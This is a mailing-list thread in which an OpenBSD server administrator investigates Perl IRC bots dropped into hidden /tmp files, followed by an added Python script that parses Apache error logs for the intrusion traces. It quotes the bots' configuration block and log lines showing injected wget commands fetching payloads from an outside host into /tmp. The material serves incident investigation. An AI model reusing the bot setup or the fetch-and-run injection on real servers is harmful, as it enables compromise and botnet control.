Looks like you've made some new friends in Manaus, Brazil :-)
-p.
On Wed, Jan 04, 2006 at 02:50:01PM +0000, Gaby vanhegan wrote:
> To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
> i386.
>
> I have some suspect files in /tmp, and I'm fairly sure that they
> shouldn't be there. Only thing I can't twig is what method the
> attackers used to get the files into that directory. The files are:
>
> ################################### Microsoft Search Worm - by br0k3d ###########################################
> #### ##### From the same author of LinuxDay Worm and other variants #### #######
>
> And:
>
> # ShellBOT
> # 0ldW0lf - [EMAIL PROTECTED]
> # - www.atrix-br.cjb.net
> # - www.atrix.cjb.net
>
> in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they
> just look like IRC clients written in Perl that have some remote
> commands for DOS, and the likes. They connect to a chatroom and
> print some message or other. If anybody wants to have some fun, the
> main config block is:
>
> # IRC
> my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala"); # administrators' nicks
> my @canais=("#gestapo");
> my $nick='ADOLFHITLER'; # bot nick.. if the nick is already in use.. it will show up with a random number at the end
> my $ircname = 'SSSA';
> chop (my $realname = `uname -a`);
> $servidor='irc.agitamanaus.net' unless $servidor; # irc server to use if none is given as an argument
> my $porta='6667'; # irc server port
>
> My question is how did these files get into the machine. I have
> entries in the httpd error log that look like this:
>
> --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
> => `/tmp/.cpanel'
> Resolving arnold.dvclub.com.hk... done.
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
> HTTP request sent, awaiting response... --05:10:57-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
> => `/tmp/.cpanel.tmp'
> Resolving arnold.dvclub.com.hk... done.
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
> Retrying.
>
> --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
> (try: 2) => `/tmp/.cpanel.tmp'
> Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
> Length: 3,355 [text/plain]
>
> 0K ... 100% 468.05 KB/s
>
> 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
>
> So something is clearly injecting a command into a script, and it is
> causing wget to run and fetch some files. There are more instances
> of the same thing, but they're all fetching a file from the same
> place (either .cpanel, .cpanel.tmp or .plesk).
>
> Because they're in the default Apache error log, the attacker must
> have hit a website on the machine that doesn't have an ErrorLog
> defined, or they hit the machine by IP instead of a hostname. I got
> a list of sites that have no error log (and would log to /var/www/
> logs/error_log) and checked their transfer logs. None of them had
> any entries in them that correspond to any of the times on the wget
> entries, so I learn nothing from this. There are earlier entries as
> well, doing the same thing, but to a different site.
>
> I'm going to do a bulk grep on all the web server logs to see if
> anything about wget turns up in any of them, and if I can then work
> out which script on which site is causing the problem. As far as I
> can tell, there is no damage, but there are some entries like these
> in the error logs:
>
> /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
> /tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
> /tmp/x44423[4]: syntax error: `(' unexpected
>
> Am I right in thinking that these entries show somebody trying to run
> a Linux binary unsuccessfully? Good job I leave Linux emulation
> turned off... :)
>
> So, what's my next move? My daily/weekly security emails show
> nothing to be worried about, no changes to any system critical files
> or anything of that ilk. Where can I look for more information or
> clues? I know the machine is due for an upgrade, and that's next on
> my list. I would provide a dmesg but the machine has been up for a
> while with one full disk, so it's been pushed out of the end of the
> dmesg file.
>
> Gaby
>
> --
> Junkets for bunterish lickspittles since 1998!
> http://vanhegan.net/sudoku/
> http://weblog.vanhegan.net/
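The "bulk grep" Gaby describes above can be made a little more systematic. The following Python script is an added example for this thread, not something posted by either participant: it parses an Apache error log for the two artefacts quoted in the message (wget's progress output, which ends up in the error log because the web server's stderr is inherited by whatever command the injected script spawned, and the `<path>[<line>]: ... not found` messages a shell emits when it is handed an ELF binary as if it were a script), lists the files dropped into hidden `/tmp` paths, and produces the time windows to search in each site's transfer log. The log excerpt embedded in the script is constructed for the example, with `example.invalid` and 192.0.2.x addresses standing in for the real hostname and IP from the thread.

```python
import re
from datetime import datetime, timedelta

# Constructed sample error-log excerpt modelled on the lines quoted in the
# thread. Hostnames, addresses and the trailing Apache line are illustrative.
SAMPLE_ERROR_LOG = """\
--05:10:47--  http://example.invalid/phpBB2/linuxday.txt
           => `/tmp/.cpanel'
Resolving example.invalid... done.
Connecting to example.invalid[192.0.2.10]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://example.invalid/phpBB2/linuxdaybot.txt
           => `/tmp/.cpanel.tmp'
Connecting to example.invalid[192.0.2.10]:80... failed: Connection timed out.
Retrying.
--05:12:13--  http://example.invalid/phpBB2/linuxdaybot.txt
  (try: 2) => `/tmp/.cpanel.tmp'
05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
/tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected
[Wed Jan  4 05:30:00 2006] [error] [client 192.0.2.50] File does not exist: /var/www/htdocs/favicon.ico
"""

# wget announces each fetch as "--HH:MM:SS--  URL" followed by "=> `dest'",
# possibly with "(try: N)" in between and possibly run together with the
# previous fetch's status text, so this is matched across newlines.
FETCH_RE = re.compile(
    r"--(\d{2}:\d{2}:\d{2})--\s+(\S+)\s+(?:\(try:\s*\d+\)\s*)?=>\s*`([^']+)'"
)
# "HH:MM:SS (rate) - `dest' saved [got/total]"
SAVED_RE = re.compile(
    r"^(\d{2}:\d{2}:\d{2}) \(.*?\) - `([^']+)' saved \[(\d+)/(\d+)\]", re.M
)
# A POSIX shell reporting errors from a "script": "/path[line]: message"
SHELL_ERR_RE = re.compile(r"^(/[^\s\[]+)\[(\d+)\]: (.*)$", re.M)


def find_fetches(text):
    """Return (time, url, destination) for every wget fetch announced in the log."""
    return [m.groups() for m in FETCH_RE.finditer(text)]


def find_saved_files(text):
    """Return (time, path, bytes_received, bytes_expected) for completed downloads."""
    return [(t, p, int(got), int(tot)) for t, p, got, tot in SAVED_RE.findall(text)]


def find_shell_exec_errors(text):
    """Group shell error lines by the 'script' path; an ELF header in the
    message means the shell was asked to run a native binary it could not
    execute (on OpenBSD without Linux emulation, exactly the symptom above)."""
    out = {}
    for path, _lineno, msg in SHELL_ERR_RE.findall(text):
        entry = out.setdefault(path, {"lines": 0, "elf_header": False})
        entry["lines"] += 1
        if "ELF" in msg:
            entry["elf_header"] = True
    return out


def hidden_tmp_destinations(fetches):
    """Download targets that are dot-files under /tmp or /var/tmp."""
    return sorted({d for _, _, d in fetches if re.match(r"/(?:var/)?tmp/\.", d)})


def access_log_windows(fetches, slack=timedelta(seconds=30)):
    """(start, end) HH:MM:SS windows around each fetch, to grep in the
    transfer logs for the request that triggered the download."""
    windows = []
    for t, _, _ in fetches:
        when = datetime.strptime(t, "%H:%M:%S")
        windows.append(((when - slack).strftime("%H:%M:%S"),
                        (when + slack).strftime("%H:%M:%S")))
    return windows


if __name__ == "__main__":
    fetches = find_fetches(SAMPLE_ERROR_LOG)
    for t, url, dest in fetches:
        print(f"{t}  fetch {url} -> {dest}")
    print("dropped into hidden tmp paths:", hidden_tmp_destinations(fetches))
    print("completed saves:", find_saved_files(SAMPLE_ERROR_LOG))
    print("binary-as-script errors:", find_shell_exec_errors(SAMPLE_ERROR_LOG))
    print("search transfer logs in windows:", access_log_windows(fetches))
```

Run it against a real error_log by reading the file into `find_fetches` and friends; the windows it prints are what to grep for in each virtual host's transfer log, since the request that spawned wget will have been logged there a few seconds before the fetch started, even when the error lines themselves carry no client address.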